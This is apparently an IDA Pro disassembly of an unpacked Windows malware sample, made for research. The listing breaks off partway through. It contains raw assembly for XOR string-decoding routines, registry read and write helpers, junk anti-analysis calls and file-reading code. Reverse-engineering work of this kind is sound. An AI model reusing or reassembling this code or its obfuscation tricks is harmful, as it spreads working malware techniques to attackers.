;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 5A0EC6EF259796FEB166CC67E65A50A8
; File Name : u:\work\5a0ec6ef259796feb166cc67e65a50a8_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; DATA XREF: sub_401020+A�o
; sub_43DFC9+A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
xor eax, eax
inc eax
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: sub_401000+E�j
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_40C694 ; RtlUnwind
sub_40107A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401092 proc near ; DATA XREF: sub_40107A+B�o
; sub_43E023+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401092 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: sub_401219+10�o
; sub_407F67+A�o ...
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_43B08C, eax
mov dword_43B090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_43B090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_43B030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_43B034, eax
mov eax, [edx+4]
mov dword_43B038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_43B03C
mov esi, dword_43B034
rep movsd
lea edi, dword_43B03C
mov dword_43B034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_43B010, 0Bh
push 0Bh
call sub_40CA24
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_43B010, 8
push 8
call sub_40CA24
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_43B010
call sub_40CA24
add esp, 8
push dword_43B010
call sub_40CA0C
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_43B02C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_43B02C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401219 proc near ; CODE XREF: start+500�j
; DATA XREF: start:loc_4494FC�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43B01C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_43B028
push offset dword_43B024
push offset dword_43B020
call sub_40C9AC
push dword_43B028
push dword_43B024
push dword_43B020
mov dword_43B014, esp
call sub_40C434
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax
call sub_40C9DC
leave
retn
sub_401219 endp
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129C proc near ; CODE XREF: sub_408E89+1E�p
; sub_408E89+3A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43B09C
lea eax, ds:41A870h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4012DC
; ---------------------------------------------------------------------------
loc_4012C2: ; CODE XREF: sub_40129C+42�j
mov eax, dword_43B09C
add eax, edi
lea eax, ds:41A870h[eax]
movsx edx, byte ptr [eax]
xor edx, 0ADh
mov [eax], dl
inc edi
loc_4012DC: ; CODE XREF: sub_40129C+24�j
cmp edi, esi
jl short loc_4012C2
mov [ebp+var_4], 1A7h
mov eax, dword_43B09C
add eax, esi
mov byte ptr ds:dword_41A870[eax], 0
mov edi, dword_43B09C
add dword_43B09C, 2
mov eax, dword_43B09C
lea eax, [eax+esi+2]
mov dword_43B09C, eax
inc dword_43B09C
cmp dword_43B09C, 0DB6h
jle short loc_40132A
and dword_43B09C, 0
loc_40132A: ; CODE XREF: sub_40129C+85�j
lea eax, dword_41A870[edi]
pop edi
pop esi
leave
retn
sub_40129C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401334 proc near ; CODE XREF: sub_408189+111�p
var_14C23 = byte ptr -14C23h
var_14C1E = byte ptr -14C1Eh
var_14C18 = dword ptr -14C18h
var_14C12 = byte ptr -14C12h
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 14C24h
call sub_40C498
push ebx
push esi
push edi
call sub_40C574 ; GetProcessHeap
lea edi, [ebp+var_14C1E]
lea esi, aVk ; " vK%;"
mov ecx, 3
rep movsw
call sub_40C514 ; GetCurrentThreadId
push 0
push 0
push 3
push 0
push 0
push 80000000h
push offset dword_40F280
call sub_40C67C ; CreateFileA
mov [ebp+var_4], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40138A
xor eax, eax
jmp loc_401424
; ---------------------------------------------------------------------------
loc_40138A: ; CODE XREF: sub_401334+4D�j
mov [ebp+var_8], 5F3Bh
mov eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov [ebp+var_8], edx
push 0
lea eax, [ebp+var_14C18]
push eax
push 14C08h
lea eax, [ebp+var_14C12]
push eax
push [ebp+var_4]
call sub_40C688 ; ReadFile
mov [ebp+var_9], 0B7h
sub [ebp+var_9], 77h
push [ebp+var_4]
call sub_40C55C ; CloseHandle
mov [ebp+var_A], 22h
sub [ebp+var_A], 6Ch
xor ebx, ebx
loc_4013D2: ; CODE XREF: sub_401334+D9�j
mov eax, 0Dh
sub eax, dword_43B098
push eax
push offset byte_432F00
lea eax, [ebp+ebx+var_14C12]
push eax
call sub_401806
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_4013FF
xor eax, eax
inc eax
jmp short loc_401424
; ---------------------------------------------------------------------------
loc_4013FF: ; CODE XREF: sub_401334+C4�j
call sub_40C538 ; RtlGetLastWin32Error
add ebx, 11h
cmp ebx, [ebp+var_14C18]
jb short loc_4013D2
lea edi, [ebp+var_14C23]
lea esi, aByxy ; "Byxy"
mov ecx, 5
rep movsb
xor eax, eax
loc_401424: ; CODE XREF: sub_401334+51�j
; sub_401334+C9�j
pop edi
pop esi
pop ebx
leave
retn
sub_401334 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 2ADh
push esi
push dword ptr [ebp+8]
mov eax, dword_43B234
lea eax, ds:4196E0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_401472
; ---------------------------------------------------------------------------
loc_401458: ; CODE XREF: .text:00401474�j
mov eax, dword_43B234
add eax, edi
lea eax, ds:4196E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0ACh
mov [eax], dl
inc edi
loc_401472: ; CODE XREF: .text:00401456�j
cmp edi, esi
jl short loc_401458
mov dword ptr [ebp-8], 194h
mov eax, dword_43B234
add eax, esi
mov byte ptr ds:dword_4196E0[eax], 0
mov edi, dword_43B234
mov eax, edi
add eax, 2
add eax, esi
mov dword_43B234, eax
cmp eax, 0DF0h
jle short loc_4014AC
and dword_43B234, 0
loc_4014AC: ; CODE XREF: .text:004014A3�j
mov dword ptr [ebp-0Ch], 3DCh
lea eax, dword_4196E0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014BD proc near ; CODE XREF: sub_4062CD+D3�p
; sub_408BE4+E6�p ...
var_14 = byte ptr -14h
var_F = byte ptr -0Fh
var_A = byte ptr -0Ah
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
lea edi, [ebp+var_A]
lea esi, aMI5 ; "m i5"
mov ecx, 5
rep movsb
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C934 ; RegOpenKeyExA
mov ebx, eax
lea edi, [ebp+var_F]
lea esi, a4Ec ; "4%ec"
mov ecx, 5
rep movsb
or ebx, ebx
jz short loc_401506
xor eax, eax
jmp short loc_401549
; ---------------------------------------------------------------------------
loc_401506: ; CODE XREF: sub_4014BD+43�j
lea edi, [ebp+var_14]
lea esi, aXuT ; "xU t"
mov ecx, 5
rep movsb
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_40C940 ; RegQueryValueExA
mov ebx, eax
mov [ebp+var_5], 0F0h
add [ebp+var_5], 0ABh
push [ebp+var_4]
call sub_40C928 ; RegCloseKey
or ebx, ebx
jz short loc_401546
xor eax, eax
jmp short loc_401549
; ---------------------------------------------------------------------------
loc_401546: ; CODE XREF: sub_4014BD+83�j
xor eax, eax
inc eax
loc_401549: ; CODE XREF: sub_4014BD+47�j
; sub_4014BD+87�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014BD endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 3B4h
push esi
push dword ptr [ebp+8]
mov eax, dword_43B250
lea eax, ds:433FF0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_401597
; ---------------------------------------------------------------------------
loc_40157D: ; CODE XREF: .text:00401599�j
mov eax, dword_43B250
add eax, edi
lea eax, ds:433FF0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0E6h
mov [eax], dl
inc edi
loc_401597: ; CODE XREF: .text:0040157B�j
cmp edi, esi
jl short loc_40157D
mov dword ptr [ebp-8], 153h
mov eax, dword_43B250
add eax, esi
mov byte ptr ds:dword_433FF0[eax], 0
mov edi, dword_43B250
add dword_43B250, 3
mov eax, dword_43B250
lea eax, [eax+esi+6]
mov dword_43B250, eax
cmp eax, 0DFFh
jle short loc_4015DA
and dword_43B250, 0
loc_4015DA: ; CODE XREF: .text:004015D1�j
mov dword ptr [ebp-0Ch], 3D1h
lea eax, dword_433FF0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015EB proc near ; CODE XREF: sub_405F79+9F�p
; sub_405F79+D8�p ...
var_D = byte ptr -0Dh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
call sub_40C514 ; GetCurrentThreadId
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C91C ; RegCreateKeyExA
mov ebx, eax
or ebx, ebx
jz short loc_401628
xor eax, eax
jmp short loc_401675
; ---------------------------------------------------------------------------
loc_401628: ; CODE XREF: sub_4015EB+37�j
lea edi, [ebp+var_D]
lea esi, aDGu ; "D GU"
mov ecx, 5
rep movsb
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_40C94C ; RegSetValueExA
mov ebx, eax
push [ebp+var_4]
call sub_40C928 ; RegCloseKey
or ebx, ebx
jz short loc_401660
xor eax, eax
jmp short loc_401675
; ---------------------------------------------------------------------------
loc_401660: ; CODE XREF: sub_4015EB+6F�j
call sub_40C5A4 ; GetVersion
cmp [ebp+var_8], 1
jnz short loc_401672
mov eax, 2
jmp short loc_401675
; ---------------------------------------------------------------------------
loc_401672: ; CODE XREF: sub_4015EB+7E�j
xor eax, eax
inc eax
loc_401675: ; CODE XREF: sub_4015EB+3B�j
; sub_4015EB+73�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4015EB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B264
lea eax, ds:437190h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 5Fh
xor edi, edi
jmp short loc_4016BF
; ---------------------------------------------------------------------------
loc_4016A8: ; CODE XREF: .text:004016C1�j
mov eax, dword_43B264
add eax, edi
lea eax, ds:437190h[eax]
movsx edx, byte ptr [eax]
xor edx, 0Eh
mov [eax], dl
inc edi
loc_4016BF: ; CODE XREF: .text:004016A6�j
cmp edi, esi
jl short loc_4016A8
mov eax, dword_43B264
add eax, esi
mov byte ptr ds:dword_437190[eax], 0
xor edi, edi
mov edi, dword_43B264
mov eax, edi
inc eax
add eax, esi
mov dword_43B264, eax
add dword_43B264, 3
cmp dword_43B264, 0DE6h
jle short loc_4016FE
and dword_43B264, 0
loc_4016FE: ; CODE XREF: .text:004016F5�j
mov dword ptr [ebp-8], 6
lea eax, dword_437190[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40170F proc near ; CODE XREF: sub_405601+166�p
; sub_408BE4+3A�p ...
var_4 = byte ptr -4
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_1], 9Fh
add [ebp+var_1], 0CBh
lea edi, [ebp+var_4]
lea esi, dword_43B268
mov ecx, 3
rep movsb
xor ebx, ebx
jmp short loc_40175A
; ---------------------------------------------------------------------------
loc_401732: ; CODE XREF: sub_40170F+4E�j
call sub_40CA18
mov edi, [ebp+arg_0]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [edi+ebx], dl
inc ebx
loc_40175A: ; CODE XREF: sub_40170F+21�j
cmp ebx, [ebp+arg_4]
jl short loc_401732
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov byte ptr [edx+eax], 0
mov eax, edx
pop edi
pop esi
pop ebx
leave
retn
sub_40170F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B274
lea eax, ds:42EBA0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 1Ah
xor edi, edi
jmp short loc_4017B4
; ---------------------------------------------------------------------------
loc_40179D: ; CODE XREF: .text:004017B6�j
mov eax, dword_43B274
add eax, edi
lea eax, ds:42EBA0h[eax]
movsx edx, byte ptr [eax]
xor edx, 48h
mov [eax], dl
inc edi
loc_4017B4: ; CODE XREF: .text:0040179B�j
cmp edi, esi
jl short loc_40179D
mov eax, dword_43B274
add eax, esi
mov byte ptr ds:dword_42EBA0[eax], 0
mov edi, dword_43B274
add dword_43B274, 3
mov eax, dword_43B274
lea eax, [eax+esi+6]
mov dword_43B274, eax
add dword_43B274, 2
cmp dword_43B274, 0DD9h
jle short loc_4017FC
and dword_43B274, 0
loc_4017FC: ; CODE XREF: .text:004017F3�j
lea eax, dword_42EBA0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401806 proc near ; CODE XREF: sub_401334+B7�p
; sub_4053A1+57�p ...
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_D], 9Fh
add [ebp+var_D], 0CBh
and [ebp+var_C], 0
lea edi, [ebp+var_10]
lea esi, dword_43B278
mov ecx, 3
rep movsb
and [ebp+var_8], 0
jmp short loc_4018AA
; ---------------------------------------------------------------------------
loc_401831: ; CODE XREF: sub_401806+B6�j
call sub_40C634 ; IsDebuggerPresent
and [ebp+var_4], 0
call sub_40C598 ; GetTickCount
xor ebx, ebx
jmp short loc_401894
; ---------------------------------------------------------------------------
loc_401843: ; CODE XREF: sub_401806+9F�j
mov [ebp+var_11], 37h
add [ebp+var_11], 1
mov eax, [ebp+var_8]
add eax, ebx
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+ebx]
cmp eax, edx
jnz short loc_401865
inc [ebp+var_4]
loc_401865: ; CODE XREF: sub_401806+5A�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_40186D: ; CODE XREF: sub_401806+6C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40186D
cmp [ebp+var_4], eax
jnz short loc_401893
call sub_40C5A4 ; GetVersion
inc [ebp+var_C]
call sub_40C574 ; GetProcessHeap
mov eax, [ebp+arg_8]
cmp [ebp+var_C], eax
jnz short loc_401893
mov eax, [ebp+var_8]
jmp short loc_4018C7
; ---------------------------------------------------------------------------
loc_401893: ; CODE XREF: sub_401806+71�j
; sub_401806+86�j
inc ebx
loc_401894: ; CODE XREF: sub_401806+3B�j
mov eax, [ebp+arg_4]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_40189C: ; CODE XREF: sub_401806+9B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40189C
cmp ebx, eax
jb short loc_401843
inc [ebp+var_8]
loc_4018AA: ; CODE XREF: sub_401806+29�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4018B2: ; CODE XREF: sub_401806+B1�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4018B2
cmp [ebp+var_8], eax
jb loc_401831
mov eax, 0FFFFh
loc_4018C7: ; CODE XREF: sub_401806+8B�j
pop edi
pop esi
pop ebx
leave
retn
sub_401806 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B284
lea eax, ds:415600h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 5Fh
xor edi, edi
jmp short loc_401911
; ---------------------------------------------------------------------------
loc_4018FA: ; CODE XREF: .text:00401913�j
mov eax, dword_43B284
add eax, edi
lea eax, ds:415600h[eax]
movsx edx, byte ptr [eax]
xor edx, 0Eh
mov [eax], dl
inc edi
loc_401911: ; CODE XREF: .text:004018F8�j
cmp edi, esi
jl short loc_4018FA
mov eax, dword_43B284
add eax, esi
mov byte ptr ds:dword_415600[eax], 0
xor edi, edi
mov edi, dword_43B284
mov eax, edi
inc eax
add eax, esi
mov dword_43B284, eax
add dword_43B284, 3
cmp dword_43B284, 0DE6h
jle short loc_401950
and dword_43B284, 0
loc_401950: ; CODE XREF: .text:00401947�j
mov dword ptr [ebp-8], 6
lea eax, dword_415600[edi]
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
lea edi, [ebp-7]
lea esi, dword_43B288
mov ecx, 7
rep movsb
mov ebx, [ebp+10h]
jmp short loc_4019A0
; ---------------------------------------------------------------------------
loc_401983: ; CODE XREF: .text:004019A3�j
mov eax, [ebp+8]
movsx eax, byte ptr [eax+ebx]
mov edx, ebx
sub edx, [ebp+10h]
mov ecx, [ebp+0Ch]
movsx edx, byte ptr [ecx+edx]
cmp eax, edx
jz short loc_40199F
xor eax, eax
inc eax
jmp short loc_4019AC
; ---------------------------------------------------------------------------
loc_40199F: ; CODE XREF: .text:00401998�j
inc ebx
loc_4019A0: ; CODE XREF: .text:00401981�j
cmp ebx, [ebp+14h]
jl short loc_401983
call sub_40C538 ; RtlGetLastWin32Error
xor eax, eax
loc_4019AC: ; CODE XREF: .text:0040199D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43B298
lea eax, ds:433000h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4019F0
; ---------------------------------------------------------------------------
loc_4019D6: ; CODE XREF: .text:004019F2�j
mov eax, dword_43B298
add eax, edi
lea eax, ds:433000h[eax]
movsx edx, byte ptr [eax]
xor edx, 8Ah
mov [eax], dl
inc edi
loc_4019F0: ; CODE XREF: .text:004019D4�j
cmp edi, esi
jl short loc_4019D6
mov eax, dword_43B298
add eax, esi
mov byte ptr ds:dword_433000[eax], 0
mov edi, dword_43B298
inc dword_43B298
mov eax, dword_43B298
add eax, 4
add eax, esi
mov dword_43B298, eax
cmp eax, 0DCFh
jle short loc_401A2C
and dword_43B298, 0
loc_401A2C: ; CODE XREF: .text:00401A23�j
lea eax, dword_433000[edi]
pop edi
pop esi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A36 proc near ; CODE XREF: sub_405601+4A�p
; sub_4062CD+470�p ...
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
var_15 = dword ptr -15h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
lea edi, [ebp+var_9]
lea esi, byte_43B29C
xor ecx, ecx
inc ecx
rep movsb
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call sub_40C67C ; CreateFileA
mov ebx, eax
call sub_40C508 ; GetCurrentProcessId
cmp ebx, 0FFFFFFFFh
jnz short loc_401AA2
mov [ebp+var_1C], 0D77h
mov eax, [ebp+var_1C]
mov edx, eax
add edx, eax
mov [ebp+var_1C], edx
cmp [ebp+arg_4], 0
jz short loc_401A90
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_401A90: ; CODE XREF: sub_401A36+52�j
lea edi, [ebp+var_1D]
lea esi, byte_43B29D
xor ecx, ecx
inc ecx
rep movsb
xor eax, eax
jmp short loc_401B0C
; ---------------------------------------------------------------------------
loc_401AA2: ; CODE XREF: sub_401A36+3B�j
push 0
push ebx
call sub_40C520 ; GetFileSize
mov [ebp+var_4], eax
call sub_40C538 ; RtlGetLastWin32Error
mov eax, [ebp+var_4]
add eax, 10h
push eax
push 40h
call sub_40C64C ; LocalAlloc
mov [ebp+var_8], eax
call sub_40C634 ; IsDebuggerPresent
push 0
cmp [ebp+arg_4], 0
jz short loc_401AD8
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
jmp short loc_401ADE
; ---------------------------------------------------------------------------
loc_401AD8: ; CODE XREF: sub_401A36+98�j
lea eax, [ebp+var_10]
mov [ebp+var_1C], eax
loc_401ADE: ; CODE XREF: sub_401A36+A0�j
push [ebp+var_1C]
push [ebp+var_4]
push [ebp+var_8]
push ebx
call sub_40C688 ; ReadFile
lea edi, [ebp+var_11]
lea esi, byte_43B29E
xor ecx, ecx
inc ecx
rep movsb
push ebx
call sub_40C55C ; CloseHandle
mov eax, dword_43B29F
mov [ebp+var_15], eax
mov eax, [ebp+var_8]
loc_401B0C: ; CODE XREF: sub_401A36+6A�j
pop edi
pop esi
pop ebx
leave
retn
sub_401A36 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 16Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_43B2AC
lea eax, ds:410850h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-8], 17Eh
xor edi, edi
jmp short loc_401B5D
; ---------------------------------------------------------------------------
loc_401B46: ; CODE XREF: .text:00401B5F�j
mov eax, dword_43B2AC
add eax, edi
lea eax, ds:410850h[eax]
movsx edx, byte ptr [eax]
xor edx, 73h
mov [eax], dl
inc edi
loc_401B5D: ; CODE XREF: .text:00401B44�j
cmp edi, esi
jl short loc_401B46
